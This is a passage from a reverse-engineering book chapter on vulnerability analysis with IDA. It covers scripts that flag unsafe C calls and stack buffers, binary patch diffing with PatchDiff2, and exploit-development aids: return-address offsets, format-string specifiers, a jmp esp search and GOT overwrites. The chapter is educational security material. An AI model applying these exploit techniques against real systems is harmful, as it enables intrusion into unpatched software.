to understand all potential inputs to the function call. Hopefully, the com-

plexity of such a task is clear. Step 1, although it seems straightforward, may

require a little effort on your part. Locating strcpy may be as easy as using the

JumpJump to Address command (G) and entering strcpy as the address to

jump to. In Windows PE binaries or statically linked ELF binaries, this is usually

all that is needed. However, with other binaries, extra steps may be required.

In a dynamically linked ELF binary, using the Jump command may not take

you directly to the desired function. Instead, it is likely to take you to an entry

in the extern section (which is involved in the dynamic-linking process). An

IDA representation of the strcpy entry in an extern section is shown here:

X extern:804DECC extrn strcpy:near ; CODE XREF: _strcpyÇj

extern:804DECC ; DATA XREF: .got:off_804D5E4Ço

To confuse matters, this location does not appear to be named strcpy

at all (it is, but the name is indented), and the only code cross-reference X

to the location is a jump cross-reference from a function that appears to be

named _strcpy, while a data cross-reference is also made to this location from

the .got section. The referencing function is actually named .strcpy, which

is not at all obvious from the display. In this case, IDA has replaced the dot

character with an underscore because IDA does not consider dots to be valid

478 Chapter 22

identifier characters by default. Double-clicking the code cross-reference

takes us to the program’s procedure linkage table (.plt) entry for strcpy, as

shown here:

.plt:08049E90 _strcpy proc near ; CODE XREF: decode+5FÈp

.plt:08049E90 ; extract_int_argument+24Èp ...

.plt:08049E90 jmp ds:off_804D5E4

.plt:08049E90 _strcpy endp

If instead we follow the data cross-reference, we end up at the corre-

sponding .got entry for strcpy shown here:

.got:0804D5E4 off_804D5E4 dd offset strcpy ; DATA XREF: _strcpyÇr

In the .got entry, we encounter another data cross-reference to the

.strcpy function in the .plt section. In practice, following the data cross-

references is the most reliable means of navigating from the extern section

to the .plt section. In dynamically linked ELF binaries, functions are called

indirectly through the procedure linkage table. Now that we have reached

the .plt, we can bring up the cross-references to _strcpy (actually .strcpy)

and begin to audit each call (of which there are at least two in this example).

This process can become tedious when we have a list of several common

functions whose calls we wish to locate and audit. At this point it may be use-

ful to develop a script that can automatically locate and comment all interest-

ing function calls for us. With comments in place, we can perform simple

searches to move from one audit location to another. The foundation for

such a script is a function that can reliably locate another function so that

we can locate all cross-references to that function. With the understanding

of ELF binaries gained in the preceding discussion, the IDC function in List-

ing 22-1 takes a function name as an input argument and returns an address

suitable for cross-reference iteration.

static getFuncAddr(fname) {

auto func = LocByName(fname);

if (func != BADADDR) {

auto seg = SegName(func);

//what segment did we find it in?

if (seg == "extern") { //Likely an ELF if we are in "extern"

//First (and only) data xref should be from got

func = DfirstB(func);

if (func != BADADDR) {

seg = SegName(func);

if (seg != ".got") return BADADDR;

//Now, first (and only) data xref should be from plt

func = DfirstB(func);

if (func != BADADDR) {

seg = SegName(func);

if (seg != ".plt") return BADADDR;

}

Vulnerability Analysis 479

}

else if (seg != ".text") {

//otherwise, if the name was not in the .text section, then we

// don't have an algorithm for finding it automatically

func = BADADDR;

}

return func;

}

Listing 22-1: Finding a function’s callable address

Using the supplied return address, it is now possible to track down all of

the references to any function whose use we want to audit. The IDC function

in Listing 22-2 leverages the getFuncAddr function from the preceding exam-

ple to obtain a function address and add comments at all calls to the function.

static flagCalls(fname) {

auto func, xref;

//get the callable address of the named function

X func = getFuncAddr(fname);

if (func != BADADDR) {

//Iterate through calls to the named function, and add a comment

//at each call

Y for (xref = RfirstB(func); xref != BADADDR; xref = RnextB(func, xref)) {

if (XrefType() == fl_CN || XrefType() == fl_CF) {

MakeComm(xref, "*** AUDIT HERE ***");

}

//Iterate through data references to the named function, and add a

//comment at reference

Z for (xref = DfirstB(func); xref != BADADDR; xref = DnextB(func, xref)) {

if (XrefType() == dr_O) {

MakeComm(xref, "*** AUDIT HERE ***");

}

Listing 22-2: Flagging calls to a designated function

Once the desired function’s address has been located X, two loops are

used to iterate over cross-references to the function. In the first loop Y, a

comment is inserted at each location that calls the function of interest. In the

second loop Z, additional comments are inserted at each location that takes

the address of the function (use of an offset cross-reference type). The sec-

ond loop is required in order to track down calls of the following style:

X .text:000194EA mov esi, ds:strcpy

.text:000194F0 push offset loc_40A006

.text:000194F5 add edi, 160h

480 Chapter 22

.text:000194FB push edi

Y .text:000194FC call esi

In this example, the compiler has cached the address of the strcpy func-

tion in the ESI register X in order to make use of a faster means of calling

strcpy later Y in the program. The call instruction shown here is faster to

execute because it is both smaller (2 bytes) and requires no additional opera-

tions to resolve the target of the call, since the address is already contained

within the CPU within the ESI register. A compiler may choose to generate

this type of code when one function makes several calls to another function.

Given the indirect nature of the call in this example, the flagCalls func-

tion in our example may see only the data cross-reference to strcpy X while

failing to see the call to strcpy Y because the call instruction does not refer-

ence strcpy directly. In practice, however, IDA possesses the capability to per-

form some limited data-flow analysis in cases such as these and is likely to

generate the disassembly shown here:

.text:000194EA mov esi, ds:strcpy

.text:000194F0 push offset loc_40A006

.text:000194F5 add edi, 160h

.text:000194FB push edi

X .text:000194FC call esi ; strcpy

Note that the call instruction X has been annotated with a comment indi-

cating which function IDA believes is being called. In addition to inserting the

comment, IDA adds a code cross-reference from the point of the call to the

function being called. This benefits the flagCalls function, because in this case

the call instruction will be found and annotated via a code cross-reference.

To finish up our example script, we need a main function that invokes

flagCalls for all of the functions that we are interested in auditing. A simple

example to annotate calls to some of the functions mentioned earlier in this

section is shown here:

static main() {

flagCalls("strcpy");

flagCalls("strcat");

flagCalls("sprintf");

flagCalls("gets");

}

After running this script, we can move from one interesting call to the

next by searching for the inserted comment text, *** AUDIT ***. Of course

this still leaves a lot of work to be done from an analysis perspective, since the

mere fact that a program calls strcpy does not make that program exploit-

able. This is where data-flow analysis comes into play. In order to understand

whether a particular call to strcpy is exploitable or not, you must determine

what parameters are being passed in to strcpy and evaluate whether those

parameters can be manipulated to your advantage or not.

Vulnerability Analysis 481

Data-flow analysis is a far more complex task than simply finding calls

to problem functions. In order to track the flow of data in a static-analysis

environment, a thorough understanding of the instruction set being used is

required. Your static-analysis tools need to understand where registers may

have been assigned values and how those values may have changed and prop-

agated to other registers. Further, your tools need a means for determining

the sizes of source and destination buffers being referenced within the pro-

gram, which in turn requires the ability to understand the layout of stack

frames and global variables as well as the ability to deduce the size of dynam-

ically allocated memory blocks. And, of course, all of this is being attempted

without actually running the program.

An interesting example of what can be accomplished with creative script-

ing comes in the form of the BugScam4 scripts created by Halvar Flake. Bug-

Scam utilizes techniques similar to the preceding examples to locate calls to

problematic functions and takes the additional step of performing rudimen-

tary data-flow analysis at each function call. The result of BugScam’s analysis

is an HTML report of potential problems in a binary. A sample report table

generated as a result of a sprintf analysis is shown here:

In this case, BugScam was able to determine the size of the input and

output buffers, which, when combined with the format specifiers contained

in the format string, were used to determine the maximum size of the gener-

ated output.

Developing scripts of this nature requires an in-depth understanding of

various exploit classes in order to develop an algorithm that can be applied

generically across a large body of binaries. Lacking such knowledge, we can

still develop scripts (or plug-ins) that answer simple questions for us faster

than we can find the answers manually.

As a final example, consider the task of locating all functions that contain

stack-allocated buffers, since these are the functions that might be suscepti-

ble to stack-based buffer-overflow attacks. Rather than manually scrolling

through a database, we can develop a script to analyze the stack frame of

each function, looking for variables that occupy large amounts of space. The

Python function in Listing 22-3 iterates through the defined members of a

given function’s stack frame in search of variables whose size is larger than a

specified minimum size.

def findStackBuffers(func_addr, minsize):

prev_idx = -1

frame = GetFrame(func_addr)

if frame == -1: return #bad function

4. See http://www.sourceforge.net/projects/bugscam/.

Address Severity Description

8048c03 5 The maximum expansion of the data appears to be larger than the

target buffer; this might be the cause of a buffer overrun! Maximum

Expansion: 1053. Target Size: 1036.

482 Chapter 22

idx = 0

prev = None

while idx < GetStrucSize(frame):

X member = GetMemberName(frame, idx)

if member is not None:

if prev_idx != -1:

#compute distance from previous field to current field

Y delta = idx - prev_idx

Z if delta >= minsize:

Message("%s: possible buffer %s: %d bytes\n" % \

(GetFunctionName(func_addr), prev, delta))

prev_idx = idx

prev = member

\ idx = idx + GetMemberSize(frame, idx)

else:

[ idx = idx + 1

Listing 22-3: Scanning for stack-allocated buffers

This function locates all the variables in a stack frame using repeated

calls to GetMemberName X for all valid offsets within the stack frame. The size

of a variable is computed as the difference between the starting offsets of two

successive variables Y. If the size exceeds a threshold size (minsize) Z, then

the variable is reported as a possible stack buffer. The index into the struc-

ture is moved along by either 1 byte [ when no member is defined at the

current offset or by the size of any member found at the current offset \. The

GetMemberSize function may seem like a more suitable choice for computing

the size of each stack variable; however, this is true only if the variable has

been sized properly by either IDA or the user. Consider the following stack

frame:

.text:08048B38 sub_8048B38 proc near

.text:08048B38

.text:08048B38 var_818 = byte ptr -818h

.text:08048B38 var_418 = byte ptr -418h

.text:08048B38 var_C = dword ptr -0Ch

.text:08048B38 arg_0 = dword ptr 8

Using the displayed byte offsets, we can compute that there are 1,024 bytes

from the start of var_818 to the start of var_418 (818h - 418h = 400h) and

1,036 bytes between the start of var_418 and the start of var_C (418h - 0Ch).

However, the stack frame might be expanded to show the following layout:

-00000818 var_818 db ?

-00000817 db ? ; undefined

-00000816 db ? ; undefined

...

-0000041A db ? ; undefined

-00000419 db ? ; undefined

-00000418 var_418 db 1036 dup(?)

-0000000C var_C dd ?

Vulnerability Analysis 483

Here, var_418 has been collapsed into an array, while var_818 appears to

be only a single byte (with 1,023 undefined bytes filling the space between

var_818 and var_418). For this stack layout, GetMemberSize will report 1 byte

for var_818 and 1,036 bytes for var_418, which is an undesirable result. The

output of a call to findStackBuffers(0x08048B38, 16) results in the following

output, regardless of whether var_818 is defined as a single byte or an array

of 1,024 bytes:

sub_8048B38: possible buffer var_818: 1024 bytes

sub_8048B38: possible buffer var_418: 1036 bytes

Creating a main function that iterates through all functions in a database

(see Chapter 15) and calls findStackBuffers for each function yields a script

that quickly points out the use of stack buffers within a program. Of course,

determining whether any of those buffers can be overflowed requires addi-

tional (usually manual) study of each function. The tedious nature of static

analysis is precisely the reason that fuzz testing is so popular.

After-the-Fact Vulnerability Discovery with IDA

A perpetual debate rages over the exact process by which software vulnerabili-

ties should be disclosed. For any vulnerability discovered in a piece of software,

we can assign the roles of discoverer (of the vulnerability) and maintainer (of

the software). In addition, we can specify a number of events, which may or

may not take place, surrounding the discovery of any vulnerability. Some of

these events are briefly described here. Please keep in mind that the entire

vulnerability-disclosure process is hotly debated, and the following terms are

by no means standardized or even widely accepted.

Discovery

The time at which a vulnerability is initially discovered. For our pur-

poses, we will also consider this to be the time at which an exploit for

that vulnerability is initially developed.

Notification

The time at which the software maintainer is initially made aware of the

vulnerability within its product. This may coincide with discovery if the

vendor happens to find the vulnerability itself.

Disclosure

The time at which a vulnerability is made known to the public. This

event can be muddied by the level of detail made available regarding

the vulnerability. Disclosure may or may not be accompanied by the

release or identification of working exploits. In some cases disclosure

also serves as notification to the vendor.

Mitigation

The time at which steps are published that, if followed, may prevent a

user from falling victim to an existing exploit. Mitigation steps are work-

around solutions for users awaiting the publication of a patch.

484 Chapter 22

Patch availability

The time at which the maintainer (or a third party) makes available a

corrected version of the vulnerable software.

Patch application

The time at which users actually install the updated, corrected software,

rendering themselves immune (hopefully) to all known attacks that rely

on the presence of the given vulnerability.

A wealth of papers are more than happy to tell you all about windows of

vulnerability, obligations on the part of the discoverer and the maintainer,

and exactly how much information should be disclosed and when that disclo-

sure should take place. Getting to the point, it is common for disclosure to

coincide with the availability of a patch.

In most cases, a vulnerability advisory is published in conjunction with

the patch. The vulnerability advisory provides some level of technical detail

describing the nature and severity of the problem that has been patched,

but the level of detail is usually insufficient to use in developing a working

exploit for the problem. Why anyone would want to develop a working exploit

is another matter. Clearly some people are interested in exploiting comput-

ers that remain unpatched, and the faster an exploit can be developed, the

greater their chance of exploiting more computers. In other cases, vendors

may be interested in developing tools that scan for the presence of unpatched

systems on networks or in developing techniques for real-time detection of

exploitation attempts. In most cases, development of such tools requires a

detailed understanding of the exact nature of the newly patched vulnerability.

Advisories may lack such essential information as the exact file or files

that contain the vulnerability, the name or location of any vulnerable func-

tions, and exactly what was changed within those functions. The patched files

themselves, however, contain all the information that an exploit developer

requires in order to develop a working exploit for the newly patched vulnera-

bility. This information is not immediately obvious, nor is it clearly intended

for the consumption of an exploit developer. Instead, this information is

present in the form of the changes that were made in order to eliminate

the underlying vulnerability. The easiest way to highlight such changes is to

compare a patched binary against its unpatched counterpart. If we have the

luxury of looking for differences in patched source files, then standard text-

oriented comparison utilities such as diff can make short work of pinpoint-

ing changes. Unfortunately, tracking down behavioral changes between two

revisions of a binary file is far more complicated than simple text file diffing.

The difficulty with using difference computation to isolate the changes

in two binaries lies in the fact that binaries can change for several reasons.

Changes may be triggered by compiler optimizations, changes to the com-

piler itself, reorganization of source code, addition of code unrelated to the

vulnerability, and of course the code that patches the vulnerability itself. The

challenge lies in isolating behavioral changes (such as those required to fix

the vulnerability) from cosmetic changes (such as the use of different regis-

ters to accomplish the same task).

Vulnerability Analysis 485

A number of tools designed specifically for binary diffing are available,

including the commercial BinDiff from Zynamics;5 the free Binary Diffing

Suite (BDS) from eEye Digital Security;6 Turbodiff,7 also free and available

from Core Labs (part of Core Security, makers of Core Impact8); and

PatchDiff29 by Nicolas Pouvesle. Each of these tools relies on supplied IDA

in one way or another. BinDiff and BDS make use of IDA scripts and plug-ins

to perform initial analysis tasks on both the patched and the unpatched ver-

sions of the binaries being analyzed. Information extracted by the plug-ins is

stored in a backend database, and each tool provides a graph-based display

and can navigate through the differences detected during the analysis phase.

Turbodiff and PatchDiff2 are implemented as IDA plug-ins and display their

results within IDA itself. The ultimate goal of these tools is to quickly high-

light the changes made to patch a vulnerability in order to understand why

the code was vulnerable in the first place. Additional information on each

tool is available on its respective website.

Representative of the free diffing tools, PatchDiff2 is an open source

project offering compiled, 32- and 64-bit Windows versions of the plug-in

along with subversion access to the plug-in source. Installing the plug-in

involves copying the plug-in binaries into <IDADIR>/plugins.

The first step in using PatchDiff2 is to create two separate IDA databases,

one for each of the two binaries to be compared. Typically one of these data-

bases would be created for the original version of the binary, while the other

database would be created for the patched version of the binary.

Invoking the plug-in typically involves opening the database for the orig-

inal binary and then activating PatchDiff2 via the EditPlugins menu or its

associated hot key (default is CTRL-8). PatchDiff2 refers to the database from

which you invoke the plug-in as IDB1, or the “first idb.” Upon activation,

PatchDiff2 will ask to open the second database against which the currently

open database will be compared; this database is known as IDB2, or the “sec-

ond idb.” Once a second database has been selected, PatchDiff2 computes a

number of identifying features for every function in each database including

5. See http://www.zynamics.com/bindiff.html. Note that in March 2011, Zynamics was acquired by

Google.

6. See http://research.eeye.com/html/tools/RT20060801-1.html.

7. See http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=turbodiff.

8. See http://www.coresecurity.com/content/core-impact-overview/.

9. See http://code.google.com/p/patchdiff2. Note also that Alexander Pick has ported PatchDiff2 to

IDA 6.0 for OS X. For more information please see https://github.com/alexander-pick/patchdiff2_ida6.

Name PatchDiff2

Author Nicolas Pouvesle

Distribution Source and binaries for IDA 5.7

Price Free

Description Binary difference generation and display

Information http://code.google.com/p/patchdiff2/

486 Chapter 22

various types of signatures, hash values, and CRC values. Utilizing these fea-

tures, PatchDiff2 creates three lists of functions titled Identical Functions,

Unmatched Functions, and Matched Functions. Each of these lists is displayed in

a new tabbed window opened by PatchDiff2.

The Identical Functions list contains the list of functions that PatchDiff2

deems to be identical in both databases. From an analysis point of view, these

functions are likely to be uninteresting because they contribute nothing to

the changes that produced the patched version of the binary.

The Unmatched Functions list shows functions from both databases that

do not appear to be similar to one another according to the metrics applied

by PatchDiff2. In practice, these functions have either been added to the

patched version, removed from the unpatched version, or are too similar to

other functions within the same binary to be able to distinguish them from

corresponding functions in the second binary. With careful manual analysis

it is often possible to match pairs of functions within the Unmatched Func-

tions list. As a general rule of thumb, it is a good idea to manually compare

the structure of functions that have similar numbers of signatures. To facili-

tate this, it is best to sort the list based on the sig column so that functions

with similar numbers of signatures are listed near one another. The first few

lines of an unmatched functions list sorted on sig are shown here.

File Function name Function address Sig Hash CRC

---- ------------- ---------------- --- ---- ---

1 sub_7CB25FE9 7CB25FE9 000000F0 F4E7267B 411C3DCC

1 sub_7CB6814C 7CB6814C 000000F0 F4E7267B 411C3DCC

2 sub_7CB6819A 7CB6819A 000000F0 F4E7267B 411C3DCC

2 sub_7CB2706A 7CB2706A 000000F0 F4E7267B 411C3DCC

It is clear that the two functions from file one are related to the two func-

tions from file two; however, PatchDiff2 is unable to determine how to pair

them up. It is not uncommon to see multiple functions with identical struc-

tures in binaries that make use of the C++ standard template library (STL). If

you are able to manually match a function from one file to its corresponding

function in the other file, you may use PatchDiff2’s Set Match feature (avail-

able on the context-sensitive menu) to choose one function in the list and

match it to a second function in the list. Figure 22-1 shows the Set Match

dialog.

Figure 22-1: Manually matching functions

with PatchDiff2

Vulnerability Analysis 487

Manual matching begins when you choose one function using the Set

Match menu option. In the resulting dialog, you must enter the address of

the matching function in the file you are not viewing. The Propagate option

asks PatchDiff2 to match as many additional functions as it can, given that

you have informed it of a new match.

The Matched Functions list contains the list of functions that PatchDiff2

deems sufficiently similar, yet not quite identical, according to the metrics

applied by in the matching process. Right-clicking any entry in this list and

selecting Display Graphs causes PatchDiff2 to display flow graphs for the

two matched functions. One such pair of graphs is shown in Figure 22-2.

PatchDiff2 makes use of color coding to highlight blocks that have been

introduced into the patched version of the binary, making it easy to focus

on the changed portions of the code.

Figure 22-2: PatchDiff2 graphical function comparison

In these graphs, blocks X through [ are present in both functions, while

block \ has been added in the patched version of the function. During dif-

ferential analysis, matched functions may be of the highest interest initially

because they are likely to contain the changes that have been incorporated

into the patched binary that address vulnerabilities discovered in the original

binary. Close study of these changes may reveal the corrections that have been

made or safety checks that have been added in order to address incorrect

behavior or exploitable conditions. If we fail to find any interesting changes

highlighted in the Matched Functions list, then the Unmatched Functions

list is our only other option for attempting to locate the patched code.

488 Chapter 22

IDA and the Exploit-Development Process

Assuming that you manage to locate a potentially exploitable vulnerability,

how can IDA help with the exploit-development process? The answer to

this question requires that you understand what type of help you need in

order for you to make use of the appropriate features of IDA.

IDA is very good at several things that can save you a tremendous

amount of trial and error when developing exploits:

zIDA graphs can be useful in determining control flow paths as a means

of understanding how a vulnerable function may be reached. Careful

selection of graph-generation parameters may be required in large bina-

ries in order to minimize the complexity of generated graphs. Refer to

Chapter 9 for more information on IDA graphs.

zIDA breaks down stack frames to a great level of detail. If you are over-

writing information in the stack, IDA will help you understand exactly

what is getting overwritten by which portions of your buffer. IDA stack

displays are also invaluable in determining the memory layout of format

string buffers.

zIDA has excellent search facilities. If you need to search for a specific

instruction (such as jmp esp) or sequence of instructions (such as pop/pop/

ret) within a binary, IDA can rapidly tell you whether the instruction(s)

is present in the binary and, if so, the exact virtual address at which the

instruction(s) is located.

zThe fact that IDA maps binaries as if they are loaded in memory makes

it easier for you to locate virtual addresses that you may require in order

to land your exploit. IDA’s disassembly listings make it simple to deter-

mine the virtual address of any globally allocated buffers as well as use-

ful addresses (such as GOT entries) to target when you have a write410

capability.

We will discuss several of these capabilities and how you can leverage

them in the following sections.

Stack Frame Breakdown

While stack-protection mechanisms are rapidly becoming standard features

in modern operating systems, many computers continue to run operating

systems that allow code to be executed in the stack, as is done in a plain-

vanilla stack-based buffer-overflow attack. Even when stack protections are

in place, overflows may be used to corrupt stack-based pointer variables,

which can be further leveraged to complete an attack.

Regardless of what you intend to do when you discover a stack-based

buffer overflow, it is vital to understand exactly what stack content will be

overwritten as your data overflows the vulnerable stack buffer. You will prob-

ably also be interested in knowing exactly how many bytes you need to write

10. A write4 capability presents an attacker with the opportunity to write 4 bytes of his choosing

to a memory location of his choosing.

Vulnerability Analysis 489

into the buffer until you can control various variables within the function’s

stack frame, including the function’s saved return address. IDA’s default stack

frame displays can answer all of these questions if you are willing to do a little

math. The distance between any two variables in the stack can be computed

by subtracting the stack offsets of the two variables. The following stack frame

includes a buffer that can be overflowed when input to the corresponding

function is carefully controlled:

-0000009C result dd ?

-00000098 buffer_132 db 132 dup(?) ; this can be overflowed

-00000014 p_buf dd ? ; pointer into buffer_132

-00000010 num_bytes dd ? ; bytes read per loop

-0000000C total_read dd ? ; total bytes read

-00000008 db ? ; undefined

-00000007 db ? ; undefined

-00000006 db ? ; undefined

-00000005 db ? ; undefined

-00000004 db ? ; undefined

-00000003 db ? ; undefined

-00000002 db ? ; undefined

-00000001 db ? ; undefined

+00000000 s db 4 dup(?)

+00000004 r db 4 dup(?) ; save return address

+00000008 filedes dd ? ; socket descriptor

The distance from the beginning of the vulnerable buffer (buffer_132)

to the saved return address is 156 bytes (4 - -98h, or 4 - -152). You can also

see that after 132 bytes (-14h - -98h), the contents of p_buf will start to get

overwritten, which may or may not cause problems. You must clearly under-

stand the effect of overwriting variables that lie beyond the end of the buffer

in order to prevent the target application from crashing before the exploit

can be triggered. In this example, filedes (a socket descriptor) might be

another problematic variable. If the vulnerable function expects to use the

socket descriptor after you have finished overflowing the buffer, then you

need to take care that any overwriting of filedes will not cause the function

to error out unexpectedly. One strategy for dealing with variables that will be

overwritten is to write values into these variables that make sense to the pro-

gram so that the program continues to function normally until your exploit

is triggered.

For a slightly more readable breakdown of a stack frame, we can modify

the stack buffer–scanning code from Listing 22-3 to enumerate all members

of a stack frame, compute their apparent size, and display the distance from

each member to the saved return address. Listing 22-4 shows the resulting

script.

func = ScreenEA() #process function at cursor location

frame = GetFrame(func)

if frame != -1:

Message("Enumerating stack for %s\n" % GetFunctionName(func))

X eip_loc = GetFrameLvarSize(func) + GetFrameRegsSize(func)

490 Chapter 22

prev_idx = -1

idx = 0

while idx < GetStrucSize(frame):

member = GetMemberName(frame, idx)

if member is not None:

if prev_idx != -1:

#compute distance from previous field to current field

delta = idx - prev_idx

Message("%15s: %4d bytes (%4d bytes to eip)\n" % \

(prev, delta, eip_loc - prev_idx))

prev_idx = idx

prev = member

idx = idx + GetMemberSize(frame, idx)

else:

idx = idx + 1

if prev_idx != -1:

#make sure we print the last field in the frame

delta = GetStrucSize(frame) - prev_idx

Message("%15s: %4d bytes (%4d bytes to eip)\n" % \

(prev, delta, eip_loc - prev_idx))

Listing 22-4: Enumerating a single stack frame using Python

This script introduces the GetFrameLvarSize and GetFrameRegsSize func-

tions (also available in IDC). These functions are used to retrieve the size of

a stack frame’s local variable and saved register areas, respectively. The saved

return address lies directly beneath these two areas, and the offset to the

saved return address is computed as the sum of these two values X. When

executed against our example function, the script produces the following

output:

Enumerating stack for handleSocket

result: 4 bytes ( 160 bytes to eip)

buffer_132: 132 bytes ( 156 bytes to eip)

p_buf: 4 bytes ( 24 bytes to eip)

num_bytes: 4 bytes ( 20 bytes to eip)

total_read: 12 bytes ( 16 bytes to eip)

s: 4 bytes ( 4 bytes to eip)

r: 4 bytes ( 0 bytes to eip)

fildes: 4 bytes ( -4 bytes to eip)

The results offer a concise summary of a function’s stack frame anno-

tated with additional information of potential use to an exploit developer.

IDA’s stack frame displays also prove useful when developing exploits for

format string vulnerabilities. As an example, consider the following short

code fragment in which the fprintf function is invoked with a user-supplied

buffer provided as the format string.

Vulnerability Analysis 491

.text:080488CA lea eax, [ebp+format]

Y.text:080488D0 mov [esp+4], eax ; format

.text:080488D4 mov eax, [ebp+stream]

X.text:080488DA mov [esp], eax ; stream

.text:080488DD call _fprintf

In this example, only two arguments are passed to fprintf, a file pointer

X and the address of the user’s buffer as a format string Y. These arguments

occupy the top two positions on the stack, memory that has already been allo-

cated by the calling function as part of the function’s prologue. The stack

frame for the vulnerable function is shown in Listing 22-5.

X-00000128 db ? ; undefined

-00000127 db ? ; undefined

-00000126 db ? ; undefined

-00000125 db ? ; undefined

Y-00000124 db ? ; undefined

-00000123 db ? ; undefined

-00000122 db ? ; undefined

-00000121 db ? ; undefined

-00000120 db ? ; undefined

-0000011F db ? ; undefined

-0000011E db ? ; undefined

-0000011D db ? ; undefined

-0000011C db ? ; undefined

-0000011B db ? ; undefined

-0000011A db ? ; undefined

-00000119 db ? ; undefined

-00000118 s1 dd ? ; offset

-00000114 stream dd ? ; offset

-00000110 format db 264 dup(?)

Listing 22-5: Stack frame for format string example

The 16 undefined bytes spanning frame offsets 128h through 119h repre-

sent the block of memory that the compiler (gcc in this case) has preallocated

for the arguments passed in to the functions that will be called by the vulner-

able function. The stream argument to fprintf will be placed at the top of the

stack X, while the format string pointer will be placed immediately below Y

the stream argument.

In format string exploits, an attacker is often interested in the distance

from the format string pointer to the beginning of the buffer holding the

attacker’s input. In the preceding stack frame, 16 bytes separate the format

string argument from the actual format string buffer. To further the discus-

sion, we will assume that an attacker has entered the following format string.

"%x %x %x %x %x"

492 Chapter 22

Here, fprintf would expect five arguments immediately following the

format string argument. The first four of these arguments would occupy the

space between the format string argument and the format string buffer. The

fifth, and final, of these arguments would overlap the first four bytes of the

format string buffer itself. Readers familiar with format string exploits11 will

know that arguments within a format string may be named explicitly by index

number. The following format string demonstrates accessing the fifth argu-

ment following the format string in order to format it as a hexadecimal

value.

"%5$x"

Continuing with the preceding example, this format string would read

the first 4 bytes of the format string buffer as an integer (which we previously

noted would occupy the space of the fifth argument to the format string

should one have been required), format that integer as a hexadecimal value,

and then output the result to the specified file stream. Additional arguments

to the format string (the sixth, seventh, and so on) would overlap successive

4-byte blocks within the format string buffer.

Crafting a format string that will work properly to exploit a vulnerable

binary can be tricky and generally relies on precise specification of arguments

within the format string. The preceding discussion demonstrates that, in many

cases, IDA may be used to quickly and accurately compute required offsets

into a format string buffer. By combining this information with information

that IDA presents when disassembling various program sections, such as

the global offset table (.got) or the destructor table (.dtor), a correct format

string may be derived accurately with no trial and error as might be required

when using only a debugger to develop an exploit.

Locating Instruction Sequences

In order to reliably land an exploit, it is often useful to employ a control-

transfer mechanism that does not require you to know the exact memory

address at which your shellcode resides. This is particularly true when

your shellcode lies in the heap or the stack, which may make the address

of your shellcode unpredictable. In such cases, it is desirable to find a regis-

ter that happens to point at your shellcode at the time your exploit is trig-

gered. For example, if the ESI register is known to point at your shellcode at

the moment you take control of the instruction pointer, it would be very

helpful if the instruction pointer happened to point to a jmp esi or call esi

instruction, which would vector execution to your shellcode without requir-

ing you to know the exact address of your shellcode. Similarly a jmp esp is

often a very handy way to transfer control to shellcode that you have placed

in the stack. This takes advantage of the fact that when a function containing

a vulnerable buffer returns, the stack pointer will be left pointing just below

the same saved return address that you just overwrote. If you continued to

11. Readers wishing to learn more about format string exploits might again refer to Jon

Erickson’s Hacking: The Art of Exploitation, 2nd Edition.

Vulnerability Analysis 493

overwrite the stack beyond the saved return address, then the stack pointer is

pointing at your data (which should be code!). The combination of a register

pointing at your shellcode along with an instruction sequence that redirects

execution by jumping to or calling the location pointed to by that register is

called a trampoline.

The notion of searching for such instruction sequences is not a new one.

In Appendix D of his paper “Variations in Exploit Methods between Linux

and Windows,”12 David Litchfield presents a program named getopcode.c

designed to search for useful instructions in Linux ELF binaries. Along simi-

lar lines, the Metasploit13 project offers its msfpescan tool, which is capable of

scanning Windows PE binaries for useful instruction sequences. IDA is just as

capable of locating interesting instruction sequences as either of these tools

when given the chance.

For the sake of example, assume that you would like to locate a jmp esp

instruction in a particular x86 binary. You could use IDA’s text-search fea-

tures to look for the string jmp esp, which you would only find if you hap-

pened to have exactly the right number of spaces between jmp and esp and

which you are unlikely to find in any case because a jump into the stack is sel-

dom used by any compiler. So why bother searching in the first place? The

answer lies in the fact that what you are actually interested in is not an occur-

rence of the disassembled text jmp esp but rather the byte sequence FF E4,

regardless of its location. For example, the following instruction contains an

embedded jmp esp:

.text:080486CD B8 FF FF E4 34 mov eax, 34E4FFFFh

Virtual address 080486CFh may be used if a jmp esp is desired. IDA’s

binary search (SearchSequence of Bytes) capability is the correct way to

rapidly locate byte sequences such as these. When performing a binary

search for exact matches against a known byte sequence, remember to per-

form a case-sensitive search, or a byte sequence such as 50 C3 (push eax/ret)

will be matched by the byte sequence 70 C3 (because 50h is an uppercase P,

while 70h is a lowercase p), which is a jump on overflow with a relative offset

of –61 bytes. Binary searches can be scripted using the FindBinary function, as

shown here:

ea = FindBinary(MinEA(), SEARCH_DOWN | SEARCH_CASE, "FF E4");

This function call begins searching down (toward higher addresses)

from the lowest virtual address in the database, in a case-sensitive manner,

in search of a jmp esp (FF E4). If sequence is found, the return value is the

virtual address of the start of the byte sequence. If the sequence is not found,

the return value is BADADDR (–1). A script that automates searches for a

wider variety of instructions is available on the book’s website. Using this

12. See http://www.nccgroup.com/Libraries/Document_Downloads/Variations_in_Exploit_methods_

between_Linux_and_Windows.sflb.ashx.

13. See http://www.metasploit.com/.

494 Chapter 22

script, we might request a search for instructions that transfer control to the

location pointed to by the EDX register and receive results similar to the

following:

Searching...

Found jmp edx (FF E2) at 0x80816e6

Found call edx (FF D2) at 0x8048138

Found 2 occurrences

Convenience scripts such as these can save a substantial amount of time

while ensuring that we don’t forget to cover all possible cases as we search for

items in a database.

Finding Useful Virtual Addresses

The last item we will mention briefly is IDA’s display of virtual addresses in its

disassemblies. Situations in which we know that our shellcode is going to end

up in a static buffer (in a .data or .bss section, for example) are almost always

better than situations in which our shellcode lands in the heap or the stack,

because we end up with a known, fixed address to which we can transfer con-

trol. This usually eliminates the need for NOP slides or the need to find spe-

cial instruction sequences.

Some exploits take advantage of the fact that attackers are able to write

any data they like to any location they choose. In many cases, this may be

restricted to a 4-byte overwrite, but this amount often turns out to be suffi-

cient. When a 4-byte overwrite is possible, one alternative is to overwrite a

function pointer with the address of our shellcode. The dynamic linking

process used in most ELF binaries utilizes a table of function pointers called

the global offset table (GOT) to store addresses of dynamically linked library

functions. When one of these table entries can be overwritten, it is possible

to hijack a function call and redirect the call to a location of the attacker’s

choosing. A typical sequence of events for an attacker in such cases is to stage

NOP SLIDES

A NOP slide is a long sequence of consecutive nop (do nothing) instructions that

provides a wider target for hitting our shellcode when the address of our shellcode is

known to be somewhat variable. Rather than targeting the first useful instruction of

our shellcode, we target the middle of the NOP slide. If the NOP slide (and hence

the rest of our payload) shifts slightly up or down in memory, we still have a good

chance of landing somewhere within the slide and successfully running into our

